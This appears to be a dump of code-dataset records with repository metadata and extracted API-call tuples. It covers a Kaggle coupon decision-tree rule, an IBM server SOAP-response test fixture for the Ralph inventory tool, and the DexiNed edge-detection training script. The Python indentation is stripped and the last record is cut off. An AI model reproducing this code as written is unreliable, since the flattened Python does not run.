| [((4, 7, 4, 16), 'math.sqrt', 'sqrt', ({(4, 12, 4, 15): 'num'}, {}), '(num)', False, 'from math import sqrt\n'), ((6, 6, 6, 70), 'emoji.emojize', 'emoji.emojize', (), '', False, 'import emoji\n')] |
apcarrik/kaggle | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/17_features/numtrees_30/rule_20.py | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Maritalstatus, obj[8]: Children, obj[9]: Education, obj[10]: Occupation, obj[11]: Income, obj[12]: Bar, obj[13]: Coffeehouse, obj[14]: Restaurant20to50, obj[15]: Direction_same, obj[16]: Distance
# {"feature": "Maritalstatus", "instances": 34, "metric_value": 0.99, "depth": 1}
if obj[7]>0:
# {"feature": "Age", "instances": 25, "metric_value": 0.9896, "depth": 2}
if obj[6]<=5:
# {"feature": "Time", "instances": 21, "metric_value": 0.9984, "depth": 3}
if obj[2]<=1:
# {"feature": "Occupation", "instances": 13, "metric_value": 0.8905, "depth": 4}
if obj[10]<=13:
# {"feature": "Coupon", "instances": 11, "metric_value": 0.684, "depth": 5}
if obj[3]>0:
# {"feature": "Distance", "instances": 10, "metric_value": 0.469, "depth": 6}
if obj[16]<=2:
return 'False'
elif obj[16]>2:
# {"feature": "Coupon_validity", "instances": 2, "metric_value": 1.0, "depth": 7}
if obj[4]<=0:
return 'True'
elif obj[4]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[10]>13:
return 'True'
else: return 'True'
elif obj[2]>1:
# {"feature": "Occupation", "instances": 8, "metric_value": 0.8113, "depth": 4}
if obj[10]<=7:
return 'True'
elif obj[10]>7:
# {"feature": "Weather", "instances": 3, "metric_value": 0.9183, "depth": 5}
if obj[1]<=0:
return 'False'
elif obj[1]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[6]>5:
return 'True'
else: return 'True'
elif obj[7]<=0:
# {"feature": "Age", "instances": 9, "metric_value": 0.5033, "depth": 2}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
else: return 'False'
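# Example usage (a minimal sketch; the 17-element feature vector is hypothetical,
# encoded as in the comment at the top of findDecision):
#
#     prediction = findDecision([1, 0, 2, 1, 1, 0, 3, 1, 1, 2, 5, 4, 1, 2, 1, 0, 1])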
| [] |
quamilek/ralph | src/ralph/discovery/tests/plugins/samples/http_ibm_system_x.py | bf7231ea096924332b874718b33cd1f43f9c783b | macs_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetHostMacAddressesResponse</wsa:Action><wsa:RelatesTo>dt:1348742659504</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:111efb9a-f7d8-4977-8472-bcad40212a71</wsa:MessageID></s:Header><s:Body><GetHostMacAddressesResponse><HostMACaddress><HostMaddr><Description>Host Ethernet MAC Address 1</Description><Address>6E:F3:DD:E5:96:40</Address></HostMaddr><HostMaddr><Description>Host Ethernet MAC Address 2</Description><Address>6E:F3:DD:E5:96:42</Address></HostMaddr></HostMACaddress></GetHostMacAddressesResponse></s:Body></s:Envelope>
'''
memory_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetMemoryInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348742659500</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:dc560696-2ba4-4917-b7e7-1aac1983b727</wsa:MessageID></s:Header><s:Body><GetMemoryInfoResponse><Memory><MemoryInfo><Description>DIMM 2</Description><PartNumber>HMT351R7BFR4A-H9</PartNumber><SerialNumber>33b8a62f</SerialNumber><ManufactureDate>4511</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 3</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>b38aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 6</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>a78aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 9</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>b524042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 11</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>ba24042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 12</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>8e8aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 15</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>7feda482</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 18</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>d924042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo></Memory></GetMemoryInfoResponse></s:Body></s:Envelope>
'''
generic_data_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetVitalProductDataResponse</wsa:Action><wsa:RelatesTo>dt:1348742659499</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:e6829941-2510-4b3d-b9f3-61c7be372dfd</wsa:MessageID></s:Header><s:Body><GetVitalProductDataResponse><GetVitalProductDataResponse><MachineLevelVPD><ProductName>System x3550 M3</ProductName><MachineTypeAndModel>794452G</MachineTypeAndModel><SerialNumber>KD55ARA</SerialNumber><UUID>99A4E4A303023961B8E1561E33328996</UUID></MachineLevelVPD><ComponentLevelVPD><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>01/27/2012:10:28:39</TimeStamp></ComponentActivityLog><VPD><FirmwareName>IMM</FirmwareName><VersionString>YUOOC7E</VersionString><ReleaseDate>09/30/2011</ReleaseDate></VPD><VPD><FirmwareName>UEFI</FirmwareName><VersionString>D6E154A</VersionString><ReleaseDate>09/23/2011</ReleaseDate></VPD><VPD><FirmwareName>DSA</FirmwareName><VersionString>DSYT89P </VersionString><ReleaseDate>10/28/2011</ReleaseDate></VPD></GetVitalProductDataResponse></GetVitalProductDataResponse></s:Body></s:Envelope>
'''
sn_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/iBMCControl/GetSPNameSettingsResponse</wsa:Action><wsa:RelatesTo>dt:1348742647137</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:d2ac4b59-9f60-456e-a182-6a077557e4c1</wsa:MessageID></s:Header><s:Body><GetSPNameSettingsResponse><SPName>SN# KD55ARA</SPName></GetSPNameSettingsResponse></s:Body></s:Envelope>
'''
processors_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetProcessorInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348757382511</wsa:RelatesTo><wsa:From><wsa:Address>http://rack-605-12-mgmt.dc2/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:9e5ec08d-0fac-449a-80fa-37cc78290a21</wsa:MessageID></s:Header><s:Body><GetProcessorInfoResponse><Processor><ProcessorInfo><Description>Processor 1</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo><ProcessorInfo><Description>Processor 2</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo></Processor></GetProcessorInfoResponse></s:Body></s:Envelope>
'''
| [] |
AdrienCourtois/DexiNed | main.py | 1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1 |
from __future__ import print_function
import argparse
import os
import time, platform
import cv2
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info
from losses import *
from model import DexiNed
# from model0C import DexiNed
from utils import (image_normalization, save_image_batch_to_disk,
visualize_result)
IS_LINUX = platform.system() == "Linux"
def train_one_epoch(epoch, dataloader, model, criterion, optimizer, device,
log_interval_vis, tb_writer, args=None):
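    """Train the model for one epoch over `dataloader`, logging the loss and
    periodically dumping visualisations of the intermediate edge maps."""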
imgs_res_folder = os.path.join(args.output_dir, 'current_res')
os.makedirs(imgs_res_folder,exist_ok=True)
# Put model in training mode
model.train()
# l_weight = [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 1.1] # for bdcn ori loss
# before [0.6,0.6,1.1,1.1,0.4,0.4,1.3] [0.4,0.4,1.1,1.1,0.6,0.6,1.3],[0.4,0.4,1.1,1.1,0.8,0.8,1.3]
l_weight = [0.7,0.7,1.1,1.1,0.3,0.3,1.3] # for bdcn loss theory 3 before the last 1.3 0.6-0..5
# l_weight = [[0.05, 2.], [0.05, 2.], [0.05, 2.],
# [0.1, 1.], [0.1, 1.], [0.1, 1.],
# [0.01, 4.]] # for cats loss
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device) # BxCxHxW
labels = sample_batched['labels'].to(device) # BxHxW
preds_list = model(images)
# loss = sum([criterion(preds, labels, l_w, device) for preds, l_w in zip(preds_list, l_weight)]) # cats_loss
loss = sum([criterion(preds, labels,l_w)/args.batch_size for preds, l_w in zip(preds_list,l_weight)]) # bdcn_loss
# loss = sum([criterion(preds, labels) for preds in preds_list]) #HED loss, rcf_loss
optimizer.zero_grad()
loss.backward()
optimizer.step()
if tb_writer is not None:
tb_writer.add_scalar('loss',
loss.detach(),
(len(dataloader) * epoch + batch_id))
if batch_id % 5 == 0:
print(time.ctime(), 'Epoch: {0} Sample {1}/{2} Loss: {3}'
.format(epoch, batch_id, len(dataloader), loss.item()))
if batch_id % log_interval_vis == 0:
res_data = []
img = images.cpu().numpy()
res_data.append(img[2])
ed_gt = labels.cpu().numpy()
res_data.append(ed_gt[2])
# tmp_pred = tmp_preds[2,...]
for i in range(len(preds_list)):
tmp = preds_list[i]
tmp = tmp[2]
# print(tmp.shape)
tmp = torch.sigmoid(tmp).unsqueeze(dim=0)
tmp = tmp.cpu().detach().numpy()
res_data.append(tmp)
vis_imgs = visualize_result(res_data, arg=args)
del tmp, res_data
vis_imgs = cv2.resize(vis_imgs,
(int(vis_imgs.shape[1]*0.8), int(vis_imgs.shape[0]*0.8)))
img_test = 'Epoch: {0} Sample {1}/{2} Loss: {3}' \
.format(epoch, batch_id, len(dataloader), loss.item())
BLACK = (0, 0, 255)
font = cv2.FONT_HERSHEY_SIMPLEX
font_size = 1.1
font_color = BLACK
font_thickness = 2
x, y = 30, 30
vis_imgs = cv2.putText(vis_imgs,
img_test,
(x, y),
font, font_size, font_color, font_thickness, cv2.LINE_AA)
cv2.imwrite(os.path.join(imgs_res_folder, 'results.png'), vis_imgs)
def validate_one_epoch(epoch, dataloader, model, device, output_dir, arg=None):
# XXX This is not really validation, but testing
# Put model in eval mode
model.eval()
with torch.no_grad():
for _, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
# labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
preds = model(images)
# print('pred shape', preds[0].shape)
save_image_batch_to_disk(preds[-1],
output_dir,
file_names,img_shape=image_shape,
arg=arg)
def test(checkpoint_path, dataloader, model, device, output_dir, args):
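    """Restore weights from `checkpoint_path` and run inference over
    `dataloader`, saving the predicted edge maps to `output_dir`."""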
if not os.path.isfile(checkpoint_path):
raise FileNotFoundError(
f"Checkpoint filte note found: {checkpoint_path}")
print(f"Restoring weights from: {checkpoint_path}")
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
# Put model in evaluation mode
model.eval()
with torch.no_grad():
total_duration = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print(f"input tensor shape: {images.shape}")
# images = images[:, [2, 1, 0], :, :]
start_time = time.time()
preds = model(images)
tmp_duration = time.time() - start_time
total_duration.append(tmp_duration)
save_image_batch_to_disk(preds,
output_dir,
file_names,
image_shape,
arg=args)
torch.cuda.empty_cache()
total_duration = np.array(total_duration)
print("******** Testing finished in", args.test_data, "dataset. *****")
print("Average time per image: %f.4" % total_duration.mean(), "seconds")
print("Time spend in the Dataset: %f.4" % total_duration.sum(), "seconds")
def testPich(checkpoint_path, dataloader, model, device, output_dir, args):
    # a test pass that additionally runs the model on channel-interchanged inputs
if not os.path.isfile(checkpoint_path):
raise FileNotFoundError(
f"Checkpoint filte note found: {checkpoint_path}")
print(f"Restoring weights from: {checkpoint_path}")
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
# Put model in evaluation mode
model.eval()
with torch.no_grad():
total_duration = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print(f"input tensor shape: {images.shape}")
start_time = time.time()
# images2 = images[:, [1, 0, 2], :, :] #GBR
images2 = images[:, [2, 1, 0], :, :] # RGB
preds = model(images)
preds2 = model(images2)
tmp_duration = time.time() - start_time
total_duration.append(tmp_duration)
save_image_batch_to_disk([preds,preds2],
output_dir,
file_names,
image_shape,
arg=args, is_inchannel=True)
torch.cuda.empty_cache()
total_duration = np.array(total_duration)
print("******** Testing finished in", args.test_data, "dataset. *****")
print("Average time per image: %f.4" % total_duration.mean(), "seconds")
print("Time spend in the Dataset: %f.4" % total_duration.sum(), "seconds")
def parse_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description='DexiNed trainer.')
parser.add_argument('--choose_test_data',
type=int,
default=3,
help='Already set the dataset for testing choice: 0 - 8')
# ----------- test -------0--
TEST_DATA = DATASET_NAMES[parser.parse_args().choose_test_data] # max 8
test_inf = dataset_info(TEST_DATA, is_linux=IS_LINUX)
test_dir = test_inf['data_dir']
is_testing = True # current test _bdcnlossNew256-sd7-1.10.4p5
# Training settings
TRAIN_DATA = DATASET_NAMES[0] # BIPED=0
train_inf = dataset_info(TRAIN_DATA, is_linux=IS_LINUX)
train_dir = train_inf['data_dir']
# Data parameters
parser.add_argument('--input_dir',
type=str,
default=train_dir,
help='the path to the directory with the input data.')
parser.add_argument('--input_val_dir',
type=str,
default=test_inf['data_dir'],
help='the path to the directory with the input data for validation.')
parser.add_argument('--output_dir',
type=str,
default='checkpoints',
help='the path to output the results.')
parser.add_argument('--train_data',
type=str,
choices=DATASET_NAMES,
default=TRAIN_DATA,
help='Name of the dataset.')
parser.add_argument('--test_data',
type=str,
choices=DATASET_NAMES,
default=TEST_DATA,
help='Name of the dataset.')
parser.add_argument('--test_list',
type=str,
default=test_inf['test_list'],
help='Dataset sample indices list.')
parser.add_argument('--train_list',
type=str,
default=train_inf['train_list'],
help='Dataset sample indices list.')
parser.add_argument('--is_testing',type=bool,
default=is_testing,
help='Script in testing mode.')
parser.add_argument('--double_img',
type=bool,
default=True,
help='True: use same 2 imgs changing channels') # Just for test
parser.add_argument('--resume',
type=bool,
default=False,
help='use previous trained data') # Just for test
parser.add_argument('--checkpoint_data',
type=str,
default='14/14_model.pth',
                        help='Checkpoint path from which to restore the model weights.')
parser.add_argument('--test_img_width',
type=int,
default=test_inf['img_width'],
help='Image width for testing.')
parser.add_argument('--test_img_height',
type=int,
default=test_inf['img_height'],
help='Image height for testing.')
parser.add_argument('--res_dir',
type=str,
default='result',
help='Result directory')
parser.add_argument('--log_interval_vis',
type=int,
default=50,
help='The number of batches to wait before printing test predictions.')
parser.add_argument('--epochs',
type=int,
default=22,
metavar='N',
                        help='Number of training epochs (default: 22).')
parser.add_argument('--lr',
default=1e-4,
type=float,
help='Initial learning rate.')
parser.add_argument('--wd',
type=float,
default=1e-4,
metavar='WD',
help='weight decay (default: 1e-4)')
# parser.add_argument('--lr_stepsize',
# default=1e4,
# type=int,
# help='Learning rate step size.')
parser.add_argument('--batch_size',
type=int,
default=8,
metavar='B',
help='the mini-batch size (default: 8)')
parser.add_argument('--workers',
default=8,
type=int,
help='The number of workers for the dataloaders.')
parser.add_argument('--tensorboard',type=bool,
default=True,
                        help='Use Tensorboard for logging.')
parser.add_argument('--img_width',
type=int,
default=480,
help='Image width for training.') # BIPED 400 BSDS 352 MDBD 480
parser.add_argument('--img_height',
type=int,
default=480,
help='Image height for training.') # BIPED 400 BSDS 352
parser.add_argument('--channel_swap',
default=[2, 1, 0],
type=int)
parser.add_argument('--crop_img',
default=True,
type=bool,
help='If true crop training images, else resize images to match image width and height.')
parser.add_argument('--mean_pixel_values',
default=[103.939,116.779,123.68, 137.86],
type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892]
args = parser.parse_args()
return args
def main(args):
"""Main function."""
print(f"Number of GPU's available: {torch.cuda.device_count()}")
print(f"Pytorch version: {torch.__version__}")
# Tensorboard summary writer
tb_writer = None
training_dir = os.path.join(args.output_dir,args.train_data)
os.makedirs(training_dir,exist_ok=True)
checkpoint_path = os.path.join(args.output_dir, args.train_data, args.checkpoint_data)
if args.tensorboard and not args.is_testing:
# from tensorboardX import SummaryWriter # previous torch version
        from torch.utils.tensorboard import SummaryWriter  # for torch 1.4 or greater
tb_writer = SummaryWriter(log_dir=training_dir)
# Get computing device
device = torch.device('cpu' if torch.cuda.device_count() == 0
else 'cuda')
# Instantiate model and move it to the computing device
model = DexiNed().to(device)
# model = nn.DataParallel(model)
    ini_epoch = 0
if not args.is_testing:
if args.resume:
ini_epoch=17
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
dataset_train = BipedDataset(args.input_dir,
img_width=args.img_width,
img_height=args.img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
train_mode='train',
arg=args
)
dataloader_train = DataLoader(dataset_train,
batch_size=args.batch_size,
shuffle=True,
num_workers=args.workers)
dataset_val = TestDataset(args.input_val_dir,
test_data=args.test_data,
img_width=args.test_img_width,
img_height=args.test_img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
test_list=args.test_list, arg=args
)
dataloader_val = DataLoader(dataset_val,
batch_size=1,
shuffle=False,
num_workers=args.workers)
# Testing
if args.is_testing:
output_dir = os.path.join(args.res_dir, args.train_data+"2"+ args.test_data)
print(f"output_dir: {output_dir}")
if args.double_img:
            # predict each image twice with interchanged channels, then mix those results
testPich(checkpoint_path, dataloader_val, model, device, output_dir, args)
else:
test(checkpoint_path, dataloader_val, model, device, output_dir, args)
return
criterion = bdcn_loss2
optimizer = optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.wd)
# lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize,
# gamma=args.lr_gamma)
# Main training loop
    seed = 1021
for epoch in range(ini_epoch,args.epochs):
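        # Refresh the numpy/torch random seeds every 7 epochs so the stochastic
        # shuffling/augmentation pattern changes periodically during training.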
if epoch%7==0:
seed = seed+1000
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
print("------ Random seed applied-------------")
# Create output directories
output_dir_epoch = os.path.join(args.output_dir,args.train_data, str(epoch))
img_test_dir = os.path.join(output_dir_epoch, args.test_data + '_res')
os.makedirs(output_dir_epoch,exist_ok=True)
os.makedirs(img_test_dir,exist_ok=True)
train_one_epoch(epoch,
dataloader_train,
model,
criterion,
optimizer,
device,
args.log_interval_vis,
tb_writer,
args=args)
validate_one_epoch(epoch,
dataloader_val,
model,
device,
img_test_dir,
arg=args)
# Save model after end of every epoch
torch.save(model.module.state_dict() if hasattr(model, "module") else model.state_dict(),
os.path.join(output_dir_epoch, '{0}_model.pth'.format(epoch)))
if __name__ == '__main__':
args = parse_args()
main(args)
| [((23, 22, 23, 66), 'os.path.join', 'os.path.join', ({(23, 35, 23, 50): 'args.output_dir', (23, 52, 23, 65): '"""current_res"""'}, {}), "(args.output_dir, 'current_res')", False, 'import os\n'), ((24, 4, 24, 46), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((193, 13, 193, 68), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((202, 15, 202, 57), 'datasets.dataset_info', 'dataset_info', (), '', False, 'from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info\n'), ((208, 16, 208, 59), 'datasets.dataset_info', 'dataset_info', (), '', False, 'from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info\n'), ((336, 19, 336, 64), 'os.path.join', 'os.path.join', ({(336, 32, 336, 47): 'args.output_dir', (336, 48, 336, 63): 'args.train_data'}, {}), '(args.output_dir, args.train_data)', False, 'import os\n'), ((337, 4, 337, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((338, 22, 338, 90), 'os.path.join', 'os.path.join', ({(338, 35, 338, 50): 'args.output_dir', (338, 52, 338, 67): 'args.train_data', (338, 69, 338, 89): 'args.checkpoint_data'}, {}), '(args.output_dir, args.train_data, args.checkpoint_data)', False, 'import os\n'), ((378, 21, 381, 57), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((20, 19, 20, 36), 'platform.system', 'platform.system', ({}, {}), '()', False, 'import time, platform\n'), ((99, 9, 99, 24), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((114, 11, 114, 42), 'os.path.isfile', 'os.path.isfile', ({(114, 26, 114, 41): 'checkpoint_path'}, {}), '(checkpoint_path)', False, 'import os\n'), ((118, 26, 119, 57), 'torch.load', 'torch.load', (), '', False, 'import torch\n'), ((124, 9, 124, 24), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((152, 11, 152, 42), 'os.path.isfile', 'os.path.isfile', ({(152, 26, 152, 41): 'checkpoint_path'}, {}), '(checkpoint_path)', False, 'import os\n'), ((156, 26, 157, 57), 'torch.load', 'torch.load', (), '', False, 'import torch\n'), ((162, 9, 162, 24), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((342, 20, 342, 55), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', (), '', False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((365, 27, 368, 63), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((385, 21, 385, 84), 'os.path.join', 'os.path.join', ({(385, 34, 385, 46): 'args.res_dir', (385, 48, 385, 83): "args.train_data + '2' + args.test_data"}, {}), "(args.res_dir, args.train_data + '2' + args.test_data)", False, 'import os\n'), ((415, 23, 415, 78), 'os.path.join', 'os.path.join', ({(415, 36, 415, 52): 'output_dir_epoch', (415, 54, 415, 77): "args.test_data + '_res'"}, {}), "(output_dir_epoch, args.test_data + '_res')", False, 'import os\n'), ((416, 8, 416, 51), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((417, 8, 417, 47), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((72, 23, 72, 59), 'utils.visualize_result', 'visualize_result', (), '', False, 'from utils import image_normalization, save_image_batch_to_disk, visualize_result\n'), ((86, 23, 89, 92), 'cv2.putText', 'cv2.putText', ({(86, 35, 86, 43): 'vis_imgs', (87, 35, 87, 43): 'img_test', (88, 35, 88, 41): '(x, y)', (89, 35, 89, 39): 'font', (89, 41, 89, 50): 'font_size', (89, 52, 89, 62): 'font_color', (89, 64, 89, 78): 
'font_thickness', (89, 80, 89, 91): 'cv2.LINE_AA'}, {}), '(vis_imgs, img_test, (x, y), font, font_size, font_color,\n font_thickness, cv2.LINE_AA)', False, 'import cv2\n'), ((107, 12, 110, 45), 'utils.save_image_batch_to_disk', 'save_image_batch_to_disk', (), '', False, 'from utils import image_normalization, save_image_batch_to_disk, visualize_result\n'), ((134, 25, 134, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time, platform\n'), ((138, 12, 142, 46), 'utils.save_image_batch_to_disk', 'save_image_batch_to_disk', (), '', False, 'from utils import image_normalization, save_image_batch_to_disk, visualize_result\n'), ((143, 12, 143, 36), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ({}, {}), '()', False, 'import torch\n'), ((171, 25, 171, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time, platform\n'), ((178, 12, 182, 65), 'utils.save_image_batch_to_disk', 'save_image_batch_to_disk', (), '', False, 'from utils import image_normalization, save_image_batch_to_disk, visualize_result\n'), ((183, 12, 183, 36), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ({}, {}), '()', False, 'import torch\n'), ((349, 12, 349, 21), 'model.DexiNed', 'DexiNed', ({}, {}), '()', False, 'from model import DexiNed\n'), ((409, 12, 409, 35), 'torch.manual_seed', 'torch.manual_seed', ({(409, 30, 409, 34): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((410, 12, 410, 40), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', ({(410, 35, 410, 39): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((52, 18, 52, 30), 'time.ctime', 'time.ctime', ({}, {}), '()', False, 'import time, platform\n'), ((90, 24, 90, 68), 'os.path.join', 'os.path.join', ({(90, 37, 90, 52): 'imgs_res_folder', (90, 54, 90, 67): '"""results.png"""'}, {}), "(imgs_res_folder, 'results.png')", False, 'import os\n'), ((136, 27, 136, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time, platform\n'), ((176, 27, 176, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time, platform\n'), ((330, 40, 330, 65), 'torch.cuda.device_count', 